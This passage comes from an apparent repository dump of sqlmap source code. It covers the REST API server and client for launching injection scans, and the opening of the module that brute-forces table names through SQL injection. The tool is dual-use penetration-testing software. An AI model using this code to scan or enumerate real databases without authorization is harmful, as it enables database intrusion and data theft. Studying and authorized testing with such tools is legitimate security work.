path of the IPC database\n        self.options.api = True\n        self.options.taskid = taskid\n        self.options.database = Database.filepath\n\n        # Enforce batch mode and disable coloring and ETA\n        self.options.batch = True\n        self.options.disableColoring = True\n        self.options.eta = False\n\n        self._original_options = AttribDict(self.options)\n\n    def set_option(self, option, value):\n        self.options[option] = value\n\n    def get_option(self, option):\n        return self.options[option]\n\n    def get_options(self):\n        return self.options\n\n    def reset_options(self):\n        self.options = AttribDict(self._original_options)\n\n    def engine_start(self):\n        handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True)\n        os.close(handle)\n        saveConfig(self.options, configFile)\n\n        if os.path.exists(\"sqlmap.py\"):\n            self.process = Popen([sys.executable or \"python\", \"sqlmap.py\", \"--api\", \"-c\", configFile], shell=False, close_fds=not IS_WIN)\n        elif os.path.exists(os.path.join(os.getcwd(), \"sqlmap.py\")):\n            self.process = Popen([sys.executable or \"python\", \"sqlmap.py\", \"--api\", \"-c\", configFile], shell=False, cwd=os.getcwd(), close_fds=not IS_WIN)\n        elif os.path.exists(os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), \"sqlmap.py\")):\n            self.process = Popen([sys.executable or \"python\", \"sqlmap.py\", \"--api\", \"-c\", configFile], shell=False, cwd=os.path.join(os.path.abspath(os.path.dirname(sys.argv[0]))), close_fds=not IS_WIN)\n        else:\n            self.process = Popen([\"sqlmap\", \"--api\", \"-c\", configFile], shell=False, close_fds=not IS_WIN)\n\n    def engine_stop(self):\n        if self.process:\n            self.process.terminate()\n            return self.process.wait()\n        else:\n            return None\n\n    def engine_process(self):\n        return self.process\n\n    def engine_kill(self):\n        if self.process:\n            try:\n                self.process.kill()\n                return self.process.wait()\n            except:\n                pass\n        return None\n\n    def engine_get_id(self):\n        if self.process:\n            return self.process.pid\n        else:\n            return None\n\n    def engine_get_returncode(self):\n        if self.process:\n            self.process.poll()\n            return self.process.returncode\n        else:\n            return None\n\n    def engine_has_terminated(self):\n        return isinstance(self.engine_get_returncode(), int)\n\n# Wrapper functions for sqlmap engine\nclass StdDbOut(object):\n    def __init__(self, taskid, messagetype=\"stdout\"):\n        # Overwrite system standard output and standard error to write\n        # to an IPC database\n        self.messagetype = messagetype\n        self.taskid = taskid\n\n        if self.messagetype == \"stdout\":\n            sys.stdout = self\n        else:\n            sys.stderr = self\n\n    def write(self, value, status=CONTENT_STATUS.IN_PROGRESS, content_type=None):\n        if self.messagetype == \"stdout\":\n            if content_type is None:\n                if kb.partRun is not None:\n                    content_type = PART_RUN_CONTENT_TYPES.get(kb.partRun)\n                else:\n                    # Ignore all non-relevant messages\n                    return\n\n            output = conf.databaseCursor.execute(\"SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?\", (self.taskid, content_type))\n\n            # Delete partial output from IPC database if we have got a complete output\n            if status == CONTENT_STATUS.COMPLETE:\n                if len(output) > 0:\n                    for index in xrange(len(output)):\n                        conf.databaseCursor.execute(\"DELETE FROM data WHERE id = ?\", (output[index][0],))\n\n                conf.databaseCursor.execute(\"INSERT INTO data VALUES(NULL, ?, ?, ?, ?)\", (self.taskid, status, content_type, jsonize(value)))\n                if kb.partRun:\n                    kb.partRun = None\n\n            elif status == CONTENT_STATUS.IN_PROGRESS:\n                if len(output) == 0:\n                    conf.databaseCursor.execute(\"INSERT INTO data VALUES(NULL, ?, ?, ?, ?)\", (self.taskid, status, content_type, jsonize(value)))\n                else:\n                    new_value = \"%s%s\" % (dejsonize(output[0][2]), value)\n                    conf.databaseCursor.execute(\"UPDATE data SET value = ? WHERE id = ?\", (jsonize(new_value), output[0][0]))\n        else:\n            conf.databaseCursor.execute(\"INSERT INTO errors VALUES(NULL, ?, ?)\", (self.taskid, str(value) if value else \"\"))\n\n    def flush(self):\n        pass\n\n    def close(self):\n        pass\n\n    def seek(self):\n        pass\n\nclass LogRecorder(logging.StreamHandler):\n    def emit(self, record):\n        \"\"\"\n        Record emitted events to IPC database for asynchronous I/O\n        communication with the parent process\n        \"\"\"\n        conf.databaseCursor.execute(\"INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)\", (conf.taskid, time.strftime(\"%X\"), record.levelname, record.msg % record.args if record.args else record.msg))\n\ndef setRestAPILog():\n    if conf.api:\n        try:\n            conf.databaseCursor = Database(conf.database)\n            conf.databaseCursor.connect(\"client\")\n        except sqlite3.OperationalError as ex:\n            raise SqlmapConnectionException(\"%s ('%s')\" % (ex, conf.database))\n\n        # Set a logging handler that writes log messages to a IPC database\n        logger.removeHandler(LOGGER_HANDLER)\n        LOGGER_RECORDER = LogRecorder()\n        logger.addHandler(LOGGER_RECORDER)\n\n# Generic functions\ndef is_admin(token):\n    return DataStore.admin_token == token\n\n@hook('before_request')\ndef check_authentication():\n    if not any((DataStore.username, DataStore.password)):\n        return\n\n    authorization = request.headers.get(\"Authorization\", \"\")\n    match = re.search(r\"(?i)\\ABasic\\s+([^\\s]+)\", authorization)\n\n    if not match:\n        request.environ[\"PATH_INFO\"] = \"/error/401\"\n\n    try:\n        creds = decodeBase64(match.group(1), binary=False)\n    except:\n        request.environ[\"PATH_INFO\"] = \"/error/401\"\n    else:\n        if creds.count(':') != 1:\n            request.environ[\"PATH_INFO\"] = \"/error/401\"\n        else:\n            username, password = creds.split(':')\n            if username.strip() != (DataStore.username or \"\") or password.strip() != (DataStore.password or \"\"):\n                request.environ[\"PATH_INFO\"] = \"/error/401\"\n\n@hook(\"after_request\")\ndef security_headers(json_header=True):\n    \"\"\"\n    Set some headers across all HTTP responses\n    \"\"\"\n    response.headers[\"Server\"] = \"Server\"\n    response.headers[\"X-Content-Type-Options\"] = \"nosniff\"\n    response.headers[\"X-Frame-Options\"] = \"DENY\"\n    response.headers[\"X-XSS-Protection\"] = \"1; mode=block\"\n    response.headers[\"Pragma\"] = \"no-cache\"\n    response.headers[\"Cache-Control\"] = \"no-cache\"\n    response.headers[\"Expires\"] = \"0\"\n\n    if json_header:\n        response.content_type = \"application/json; charset=UTF-8\"\n\n##############################\n# HTTP Status Code functions #\n##############################\n\n@return_error(401)  # Access Denied\ndef error401(error=None):\n    security_headers(False)\n    return \"Access denied\"\n\n@return_error(404)  # Not Found\ndef error404(error=None):\n    security_headers(False)\n    return \"Nothing here\"\n\n@return_error(405)  # Method Not Allowed (e.g. when requesting a POST method via GET)\ndef error405(error=None):\n    security_headers(False)\n    return \"Method not allowed\"\n\n@return_error(500)  # Internal Server Error\ndef error500(error=None):\n    security_headers(False)\n    return \"Internal server error\"\n\n#############\n# Auxiliary #\n#############\n\n@get('/error/401')\ndef path_401():\n    response.status = 401\n    return response\n\n#############################\n# Task management functions #\n#############################\n\n# Users' methods\n@get(\"/task/new\")\ndef task_new():\n    \"\"\"\n    Create a new task\n    \"\"\"\n    taskid = encodeHex(os.urandom(8), binary=False)\n    remote_addr = request.remote_addr\n\n    DataStore.tasks[taskid] = Task(taskid, remote_addr)\n\n    logger.debug(\"Created new task: '%s'\" % taskid)\n    return jsonize({\"success\": True, \"taskid\": taskid})\n\n@get(\"/task/<taskid>/delete\")\ndef task_delete(taskid):\n    \"\"\"\n    Delete an existing task\n    \"\"\"\n    if taskid in DataStore.tasks:\n        DataStore.tasks.pop(taskid)\n\n        logger.debug(\"(%s) Deleted task\" % taskid)\n        return jsonize({\"success\": True})\n    else:\n        response.status = 404\n        logger.warning(\"[%s] Non-existing task ID provided to task_delete()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Non-existing task ID\"})\n\n###################\n# Admin functions #\n###################\n\n@get(\"/admin/list\")\n@get(\"/admin/<token>/list\")\ndef task_list(token=None):\n    \"\"\"\n    Pull task list\n    \"\"\"\n    tasks = {}\n\n    for key in DataStore.tasks:\n        if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr:\n            tasks[key] = dejsonize(scan_status(key))[\"status\"]\n\n    logger.debug(\"(%s) Listed task pool (%s)\" % (token, \"admin\" if is_admin(token) else request.remote_addr))\n    return jsonize({\"success\": True, \"tasks\": tasks, \"tasks_num\": len(tasks)})\n\n@get(\"/admin/flush\")\n@get(\"/admin/<token>/flush\")\ndef task_flush(token=None):\n    \"\"\"\n    Flush task spool (delete all tasks)\n    \"\"\"\n\n    for key in list(DataStore.tasks):\n        if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr:\n            DataStore.tasks[key].engine_kill()\n            del DataStore.tasks[key]\n\n    logger.debug(\"(%s) Flushed task pool (%s)\" % (token, \"admin\" if is_admin(token) else request.remote_addr))\n    return jsonize({\"success\": True})\n\n##################################\n# sqlmap core interact functions #\n##################################\n\n# Handle task's options\n@get(\"/option/<taskid>/list\")\ndef option_list(taskid):\n    \"\"\"\n    List options for a certain task ID\n    \"\"\"\n    if taskid not in DataStore.tasks:\n        logger.warning(\"[%s] Invalid task ID provided to option_list()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid task ID\"})\n\n    logger.debug(\"(%s) Listed task options\" % taskid)\n    return jsonize({\"success\": True, \"options\": DataStore.tasks[taskid].get_options()})\n\n@post(\"/option/<taskid>/get\")\ndef option_get(taskid):\n    \"\"\"\n    Get value of option(s) for a certain task ID\n    \"\"\"\n    if taskid not in DataStore.tasks:\n        logger.warning(\"[%s] Invalid task ID provided to option_get()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid task ID\"})\n\n    options = request.json or []\n    results = {}\n\n    for option in options:\n        if option in DataStore.tasks[taskid].options:\n            results[option] = DataStore.tasks[taskid].options[option]\n        else:\n            logger.debug(\"(%s) Requested value for unknown option '%s'\" % (taskid, option))\n            return jsonize({\"success\": False, \"message\": \"Unknown option '%s'\" % option})\n\n    logger.debug(\"(%s) Retrieved values for option(s) '%s'\" % (taskid, ','.join(options)))\n\n    return jsonize({\"success\": True, \"options\": results})\n\n@post(\"/option/<taskid>/set\")\ndef option_set(taskid):\n    \"\"\"\n    Set value of option(s) for a certain task ID\n    \"\"\"\n\n    if taskid not in DataStore.tasks:\n        logger.warning(\"[%s] Invalid task ID provided to option_set()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid task ID\"})\n\n    if request.json is None:\n        logger.warning(\"[%s] Invalid JSON options provided to option_set()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid JSON options\"})\n\n    for option, value in request.json.items():\n        DataStore.tasks[taskid].set_option(option, value)\n\n    logger.debug(\"(%s) Requested to set options\" % taskid)\n    return jsonize({\"success\": True})\n\n# Handle scans\n@post(\"/scan/<taskid>/start\")\ndef scan_start(taskid):\n    \"\"\"\n    Launch a scan\n    \"\"\"\n\n    if taskid not in DataStore.tasks:\n        logger.warning(\"[%s] Invalid task ID provided to scan_start()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid task ID\"})\n\n    if request.json is None:\n        logger.warning(\"[%s] Invalid JSON options provided to scan_start()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid JSON options\"})\n\n    for key in request.json:\n        if key in RESTAPI_UNSUPPORTED_OPTIONS:\n            logger.warning(\"[%s] Unsupported option '%s' provided to scan_start()\" % (taskid, key))\n            return jsonize({\"success\": False, \"message\": \"Unsupported option '%s'\" % key})\n\n    # Initialize sqlmap engine's options with user's provided options, if any\n    for option, value in request.json.items():\n        DataStore.tasks[taskid].set_option(option, value)\n\n    # Launch sqlmap engine in a separate process\n    DataStore.tasks[taskid].engine_start()\n\n    logger.debug(\"(%s) Started scan\" % taskid)\n    return jsonize({\"success\": True, \"engineid\": DataStore.tasks[taskid].engine_get_id()})\n\n@get(\"/scan/<taskid>/stop\")\ndef scan_stop(taskid):\n    \"\"\"\n    Stop a scan\n    \"\"\"\n\n    if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()):\n        logger.warning(\"[%s] Invalid task ID provided to scan_stop()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid task ID\"})\n\n    DataStore.tasks[taskid].engine_stop()\n\n    logger.debug(\"(%s) Stopped scan\" % taskid)\n    return jsonize({\"success\": True})\n\n@get(\"/scan/<taskid>/kill\")\ndef scan_kill(taskid):\n    \"\"\"\n    Kill a scan\n    \"\"\"\n\n    if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()):\n        logger.warning(\"[%s] Invalid task ID provided to scan_kill()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid task ID\"})\n\n    DataStore.tasks[taskid].engine_kill()\n\n    logger.debug(\"(%s) Killed scan\" % taskid)\n    return jsonize({\"success\": True})\n\n@get(\"/scan/<taskid>/status\")\ndef scan_status(taskid):\n    \"\"\"\n    Returns status of a scan\n    \"\"\"\n\n    if taskid not in DataStore.tasks:\n        logger.warning(\"[%s] Invalid task ID provided to scan_status()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid task ID\"})\n\n    if DataStore.tasks[taskid].engine_process() is None:\n        status = \"not running\"\n    else:\n        status = \"terminated\" if DataStore.tasks[taskid].engine_has_terminated() is True else \"running\"\n\n    logger.debug(\"(%s) Retrieved scan status\" % taskid)\n    return jsonize({\n        \"success\": True,\n        \"status\": status,\n        \"returncode\": DataStore.tasks[taskid].engine_get_returncode()\n    })\n\n@get(\"/scan/<taskid>/data\")\ndef scan_data(taskid):\n    \"\"\"\n    Retrieve the data of a scan\n    \"\"\"\n\n    json_data_message = list()\n    json_errors_message = list()\n\n    if taskid not in DataStore.tasks:\n        logger.warning(\"[%s] Invalid task ID provided to scan_data()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid task ID\"})\n\n    # Read all data from the IPC database for the taskid\n    for status, content_type, value in DataStore.current_db.execute(\"SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC\", (taskid,)):\n        json_data_message.append({\"status\": status, \"type\": content_type, \"value\": dejsonize(value)})\n\n    # Read all error messages from the IPC database\n    for error in DataStore.current_db.execute(\"SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC\", (taskid,)):\n        json_errors_message.append(error)\n\n    logger.debug(\"(%s) Retrieved scan data and error messages\" % taskid)\n    return jsonize({\"success\": True, \"data\": json_data_message, \"error\": json_errors_message})\n\n# Functions to handle scans' logs\n@get(\"/scan/<taskid>/log/<start>/<end>\")\ndef scan_log_limited(taskid, start, end):\n    \"\"\"\n    Retrieve a subset of log messages\n    \"\"\"\n\n    json_log_messages = list()\n\n    if taskid not in DataStore.tasks:\n        logger.warning(\"[%s] Invalid task ID provided to scan_log_limited()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid task ID\"})\n\n    if not start.isdigit() or not end.isdigit() or int(end) < int(start):\n        logger.warning(\"[%s] Invalid start or end value provided to scan_log_limited()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid start or end value, must be digits\"})\n\n    start = max(1, int(start))\n    end = max(1, int(end))\n\n    # Read a subset of log messages from the IPC database\n    for time_, level, message in DataStore.current_db.execute(\"SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC\", (taskid, start, end)):\n        json_log_messages.append({\"time\": time_, \"level\": level, \"message\": message})\n\n    logger.debug(\"(%s) Retrieved scan log messages subset\" % taskid)\n    return jsonize({\"success\": True, \"log\": json_log_messages})\n\n@get(\"/scan/<taskid>/log\")\ndef scan_log(taskid):\n    \"\"\"\n    Retrieve the log messages\n    \"\"\"\n\n    json_log_messages = list()\n\n    if taskid not in DataStore.tasks:\n        logger.warning(\"[%s] Invalid task ID provided to scan_log()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid task ID\"})\n\n    # Read all log messages from the IPC database\n    for time_, level, message in DataStore.current_db.execute(\"SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC\", (taskid,)):\n        json_log_messages.append({\"time\": time_, \"level\": level, \"message\": message})\n\n    logger.debug(\"(%s) Retrieved scan log messages\" % taskid)\n    return jsonize({\"success\": True, \"log\": json_log_messages})\n\n# Function to handle files inside the output directory\n@get(\"/download/<taskid>/<target>/<filename:path>\")\ndef download(taskid, target, filename):\n    \"\"\"\n    Download a certain file from the file system\n    \"\"\"\n\n    if taskid not in DataStore.tasks:\n        logger.warning(\"[%s] Invalid task ID provided to download()\" % taskid)\n        return jsonize({\"success\": False, \"message\": \"Invalid task ID\"})\n\n    path = os.path.abspath(os.path.join(paths.SQLMAP_OUTPUT_PATH, target, filename))\n    # Prevent file path traversal\n    if not path.startswith(paths.SQLMAP_OUTPUT_PATH):\n        logger.warning(\"[%s] Forbidden path (%s)\" % (taskid, target))\n        return jsonize({\"success\": False, \"message\": \"Forbidden path\"})\n\n    if os.path.isfile(path):\n        logger.debug(\"(%s) Retrieved content of file %s\" % (taskid, target))\n        content = openFile(path, \"rb\").read()\n        return jsonize({\"success\": True, \"file\": encodeBase64(content, binary=False)})\n    else:\n        logger.warning(\"[%s] File does not exist %s\" % (taskid, target))\n        return jsonize({\"success\": False, \"message\": \"File does not exist\"})\n\n@get(\"/version\")\ndef version(token=None):\n    \"\"\"\n    Fetch server version\n    \"\"\"\n\n    logger.debug(\"Fetched version (%s)\" % (\"admin\" if is_admin(token) else request.remote_addr))\n    return jsonize({\"success\": True, \"version\": VERSION_STRING.split('/')[-1]})\n\ndef server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER, username=None, password=None):\n    \"\"\"\n    REST-JSON API server\n    \"\"\"\n\n    DataStore.admin_token = encodeHex(os.urandom(16), binary=False)\n    DataStore.username = username\n    DataStore.password = password\n\n    _, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False)\n    os.close(_)\n\n    if port == 0:  # random\n        with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:\n            s.bind((host, 0))\n            port = s.getsockname()[1]\n\n    logger.info(\"Running REST-JSON API server at '%s:%d'..\" % (host, port))\n    logger.info(\"Admin (secret) token: %s\" % DataStore.admin_token)\n    logger.debug(\"IPC database: '%s'\" % Database.filepath)\n\n    # Initialize IPC database\n    DataStore.current_db = Database()\n    DataStore.current_db.connect()\n    DataStore.current_db.init()\n\n    # Run RESTful API\n    try:\n        # Supported adapters: aiohttp, auto, bjoern, cgi, cherrypy, diesel, eventlet, fapws3, flup, gae, gevent, geventSocketIO, gunicorn, meinheld, paste, rocket, tornado, twisted, waitress, wsgiref\n        # Reference: https://bottlepy.org/docs/dev/deployment.html || bottle.server_names\n\n        if adapter == \"gevent\":\n            from gevent import monkey\n            monkey.patch_all()\n        elif adapter == \"eventlet\":\n            import eventlet\n            eventlet.monkey_patch()\n        logger.debug(\"Using adapter '%s' to run bottle\" % adapter)\n        run(host=host, port=port, quiet=True, debug=True, server=adapter)\n    except socket.error as ex:\n        if \"already in use\" in getSafeExString(ex):\n            logger.error(\"Address already in use ('%s:%s')\" % (host, port))\n        else:\n            raise\n    except ImportError:\n        if adapter.lower() not in server_names:\n            errMsg = \"Adapter '%s' is unknown. \" % adapter\n            errMsg += \"List of supported adapters: %s\" % ', '.join(sorted(list(server_names.keys())))\n        else:\n            errMsg = \"Server support for adapter '%s' is not installed on this system \" % adapter\n            errMsg += \"(Note: you can try to install it with 'apt install python-%s' or 'pip%s install %s')\" % (adapter, '3' if six.PY3 else \"\", adapter)\n        logger.critical(errMsg)\n\ndef _client(url, options=None):\n    logger.debug(\"Calling '%s'\" % url)\n    try:\n        headers = {\"Content-Type\": \"application/json\"}\n\n        if options is not None:\n            data = getBytes(jsonize(options))\n        else:\n            data = None\n\n        if DataStore.username or DataStore.password:\n            headers[\"Authorization\"] = \"Basic %s\" % encodeBase64(\"%s:%s\" % (DataStore.username or \"\", DataStore.password or \"\"), binary=False)\n\n        req = _urllib.request.Request(url, data, headers)\n        response = _urllib.request.urlopen(req)\n        text = getText(response.read())\n    except:\n        if options:\n            logger.error(\"Failed to load and parse %s\" % url)\n        raise\n    return text\n\ndef client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=None, password=None):\n    \"\"\"\n    REST-JSON API client\n    \"\"\"\n\n    DataStore.username = username\n    DataStore.password = password\n\n    dbgMsg = \"Example client access from command line:\"\n    dbgMsg += \"\\n\\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\\\\{16\\\\}') && echo $taskid\" % (host, port)\n    dbgMsg += \"\\n\\t$ curl -H \\\"Content-Type: application/json\\\" -X POST -d '{\\\"url\\\": \\\"http://testphp.vulnweb.com/artists.php?artist=1\\\"}' http://%s:%d/scan/$taskid/start\" % (host, port)\n    dbgMsg += \"\\n\\t$ curl http://%s:%d/scan/$taskid/data\" % (host, port)\n    dbgMsg += \"\\n\\t$ curl http://%s:%d/scan/$taskid/log\" % (host, port)\n    logger.debug(dbgMsg)\n\n    addr = \"http://%s:%d\" % (host, port)\n    logger.info(\"Starting REST-JSON API client to '%s'...\" % addr)\n\n    try:\n        _client(addr)\n    except Exception as ex:\n        if not isinstance(ex, _urllib.error.HTTPError) or ex.code == _http_client.UNAUTHORIZED:\n            errMsg = \"There has been a problem while connecting to the \"\n            errMsg += \"REST-JSON API server at '%s' \" % addr\n            errMsg += \"(%s)\" % getSafeExString(ex)\n            logger.critical(errMsg)\n            return\n\n    commands = (\"help\", \"new\", \"use\", \"data\", \"log\", \"status\", \"option\", \"stop\", \"kill\", \"list\", \"flush\", \"version\", \"exit\", \"bye\", \"quit\")\n    colors =  ('red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'lightgrey', 'lightred', 'lightgreen', 'lightyellow', 'lightblue', 'lightmagenta', 'lightcyan')\n    autoCompletion(AUTOCOMPLETE_TYPE.API, commands=commands)\n\n    taskid = None\n    logger.info(\"Type 'help' or '?' for list of available commands\")\n\n    while True:\n        try:\n            color = colors[int(taskid or \"0\", 16) % len(colors)]\n            command = _input(\"api%s> \" % (\" (%s)\" % setColor(taskid, color) if taskid else \"\")).strip()\n            command = re.sub(r\"\\A(\\w+)\", lambda match: match.group(1).lower(), command)\n        except (EOFError, KeyboardInterrupt):\n            print()\n            break\n\n        if command in (\"data\", \"log\", \"status\", \"stop\", \"kill\"):\n            if not taskid:\n                logger.error(\"No task ID in use\")\n                continue\n            raw = _client(\"%s/scan/%s/%s\" % (addr, taskid, command))\n            res = dejsonize(raw)\n            if not res[\"success\"]:\n                logger.error(\"Failed to execute command %s\" % command)\n            dataToStdout(\"%s\\n\" % raw)\n\n        elif command.startswith(\"option\"):\n            if not taskid:\n                logger.error(\"No task ID in use\")\n                continue\n            try:\n                command, option = command.split(\" \", 1)\n            except ValueError:\n                raw = _client(\"%s/option/%s/list\" % (addr, taskid))\n            else:\n                options = re.split(r\"\\s*,\\s*\", option.strip())\n                raw = _client(\"%s/option/%s/get\" % (addr, taskid), options)\n            res = dejsonize(raw)\n            if not res[\"success\"]:\n                logger.error(\"Failed to execute command %s\" % command)\n            dataToStdout(\"%s\\n\" % raw)\n\n        elif command.startswith(\"new\"):\n            if ' ' not in command:\n                logger.error(\"Program arguments are missing\")\n                continue\n\n            try:\n                argv = [\"sqlmap.py\"] + shlex.split(command)[1:]\n            except Exception as ex:\n                logger.error(\"Error occurred while parsing arguments ('%s')\" % getSafeExString(ex))\n                taskid = None\n                continue\n\n            try:\n                cmdLineOptions = cmdLineParser(argv).__dict__\n            except:\n                taskid = None\n                continue\n\n            for key in list(cmdLineOptions):\n                if cmdLineOptions[key] is None:\n                    del cmdLineOptions[key]\n\n            raw = _client(\"%s/task/new\" % addr)\n            res = dejsonize(raw)\n            if not res[\"success\"]:\n                logger.error(\"Failed to create new task ('%s')\" % res.get(\"message\", \"\"))\n                continue\n            taskid = res[\"taskid\"]\n            logger.info(\"New task ID is '%s'\" % taskid)\n\n            raw = _client(\"%s/scan/%s/start\" % (addr, taskid), cmdLineOptions)\n            res = dejsonize(raw)\n            if not res[\"success\"]:\n                logger.error(\"Failed to start scan ('%s')\" % res.get(\"message\", \"\"))\n                continue\n            logger.info(\"Scanning started\")\n\n        elif command.startswith(\"use\"):\n            taskid = (command.split()[1] if ' ' in command else \"\").strip(\"'\\\"\")\n            if not taskid:\n                logger.error(\"Task ID is missing\")\n                taskid = None\n                continue\n            elif not re.search(r\"\\A[0-9a-fA-F]{16}\\Z\", taskid):\n                logger.error(\"Invalid task ID '%s'\" % taskid)\n                taskid = None\n                continue\n            logger.info(\"Switching to task ID '%s' \" % taskid)\n\n        elif command in (\"version\",):\n            raw = _client(\"%s/%s\" % (addr, command))\n            res = dejsonize(raw)\n            if not res[\"success\"]:\n                logger.error(\"Failed to execute command %s\" % command)\n            dataToStdout(\"%s\\n\" % raw)\n\n        elif command in (\"list\", \"flush\"):\n            raw = _client(\"%s/admin/%s\" % (addr, command))\n            res = dejsonize(raw)\n            if not res[\"success\"]:\n                logger.error(\"Failed to execute command %s\" % command)\n            elif command == \"flush\":\n                taskid = None\n            dataToStdout(\"%s\\n\" % raw)\n\n        elif command in (\"exit\", \"bye\", \"quit\", 'q'):\n            return\n\n        elif command in (\"help\", \"?\"):\n            msg = \"help           Show this help message\\n\"\n            msg += \"new ARGS       Start a new scan task with provided arguments (e.g. 'new -u \\\"http://testphp.vulnweb.com/artists.php?artist=1\\\"')\\n\"\n            msg += \"use TASKID     Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\\n\"\n            msg += \"data           Retrieve and show data for current task\\n\"\n            msg += \"log            Retrieve and show log for current task\\n\"\n            msg += \"status         Retrieve and show status for current task\\n\"\n            msg += \"option OPTION  Retrieve and show option for current task\\n\"\n            msg += \"options        Retrieve and show all options for current task\\n\"\n            msg += \"stop           Stop current task\\n\"\n            msg += \"kill           Kill current task\\n\"\n            msg += \"list           Display all tasks\\n\"\n            msg += \"version        Fetch server version\\n\"\n            msg += \"flush          Flush tasks (delete all tasks)\\n\"\n            msg += \"exit           Exit this client\\n\"\n\n            dataToStdout(msg)\n\n        elif command:\n            logger.error(\"Unknown command '%s'\" % command)\n"
  },
  {
    "path": "sqlmap/lib/utils/brute.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import division\n\nimport logging\nimport time\n\nfrom lib.core.common import Backend\nfrom lib.core.common import clearConsoleLine\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import filterListValue\nfrom lib.core.common import getFileItems\nfrom lib.core.common import getPageWordSet\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import isNoneValue\nfrom lib.core.common import ntToPosixSlashes\nfrom lib.core.common import popValue\nfrom lib.core.common import pushValue\nfrom lib.core.common import randomInt\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.common import safeSQLIdentificatorNaming\nfrom lib.core.common import safeStringFormat\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import unsafeSQLIdentificatorNaming\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.decorators import stackedmethod\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapDataException\nfrom lib.core.exception import SqlmapMissingMandatoryOptionException\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE\nfrom lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE\nfrom lib.core.settings import METADB_SUFFIX\nfrom lib.core.settings import UPPER_CASE_DBMSES\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.core.threads import runThreads\nfrom lib.request import inject\n\ndef _addPageTextWords():\n    wordsList = []\n\n    infoMsg = \"adding words used on web page to the check list\"\n    logger.info(infoMsg)\n    pageWords = getPageWordSet(kb.originalPage)\n\n    for word in pageWords:\n        word = word.lower()\n\n        if len(word) > 2 and not word[0].isdigit() and word not in wordsList:\n            wordsList.append(word)\n\n    return wordsList\n\n@stackedmethod\ndef tableExists(tableFile, regex=None):\n    if kb.choices.tableExists is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct:\n        warnMsg = \"it's not recommended to use '%s' and/or '%s' \" % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED])\n        warnMsg += \"for common table existence check\"\n        logger.warning(warnMsg)\n\n        message = \"are you sure you want to continue? [y/N] \"\n        kb.choices.tableExists = readInput(message, default='N', boolean=True)\n\n        if not kb.choices.tableExists:\n            return None\n\n    result = inject.checkBooleanExpression(\"%s\" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr())))\n\n    if result:\n        errMsg = \"can't use table existence check because of detected invalid results \"\n        errMsg += \"(most likely caused by inability of the used injection \"\n        errMsg += \"to distinguish erroneous results)\"\n        raise SqlmapDataException(errMsg)\n\n    pushValue(conf.db)\n\n    if conf.db and Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n        conf.db = conf.db.upper()\n\n    message = \"which common tables (wordlist) file do you want to use?\\n\"\n    message += \"[1] default '%s' (press Enter)\\n\" % tableFile\n    message += \"[2] custom\"\n    choice = readInput(message, default='1')\n\n    if choice == '2':\n        message = \"what's the custom common tables file location?\\n\"\n        tableFile = readInput(message) or tableFile\n\n    infoMsg = \"performing table existence using items from '%s'\" % tableFile\n    logger.info(infoMsg)\n\n    tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in 